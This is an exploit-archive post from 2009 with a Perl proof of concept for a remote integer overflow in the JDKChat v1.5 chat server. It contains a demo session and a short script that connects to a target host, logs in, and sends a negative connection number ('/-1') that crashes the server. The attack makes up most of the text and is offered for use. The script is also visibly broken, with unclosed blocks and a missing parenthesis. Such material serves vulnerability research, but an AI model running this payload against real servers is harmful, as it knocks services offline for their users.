11 March, 2009

JDKChat v1.5 Remote Integer Overflow PoC

# Title: JDKChat v1.5 Remote Integer Overflow PoC
# Summary: JDKChat is a simple C++ chat server for GNU/Linux systems.
# Users can connect to it through a simple tcp client like telnet.
# WebSite : http://www.jdkoftinoff.com/
# ---------------------------- Demo ---------------------------------
# aleks@tux ~ $ telnet 7777
# Trying
# Connected to
# Escape character is '^]'.
# Welcome To jdkchat v1.5 by J.D. Koftinoff Software, Ltd.
# http://www.jdkoftinoff.com/
# and modified by Aditya Godbole (urwithaditya@gmx.net)
# Commands available:
# /who -- (list all users along with their connection numbers)
# /exit -- (exit chat room)
# /local -- (toggle local mode for your telnet session)
# /[connection number] message -- (send private message to user at
# specified connection number)
# JDKCHAT: Aleks just entered the room.
# JDKCHAT: Users = Aleks:0
# Aleks >
# // And after we run the PoC :
# JDKCHAT: PwNzOr just entered the room.
# Aleks >Connection closed by foreign host.
# aleks@tux ~ $
# ---------------------------- /Demo --------------------------------
# Vulnerability discovered by n3tpr0b3 & LiquidWorm
# n3tpr0b3 [AT] gmail [.] com
# 12.03.2009

use IO::Socket;

if ($#ARGV != 1) {
print "
JDKChat v1.5 Remote Integer Overflow PoC By n3tpr0b3
# Usage : jdkchat_poc.pl SrvIP SrvPort #
# Greetz to LiquidWorm #

my $dupsa = new IO::Socket::INET (
PeerAddr => "$ARGV[0]",
PeerPort => "$ARGV[1]",
Proto => "tcp"
or die "Could not connect to $ARGV[0]: $!\n";

sleep 1;
print $dupsa "\x50\x77\x4e\x7a\x4f\x72\x0d";
print "#--> Loged on t3h JDKChat server...\n";
sleep 1;
print "#--> Sending our evil command... \n";
sleep 2;
print $dupsa "\x2f\x2d\x31\x0d";
print "#--> Server pwned... \n";



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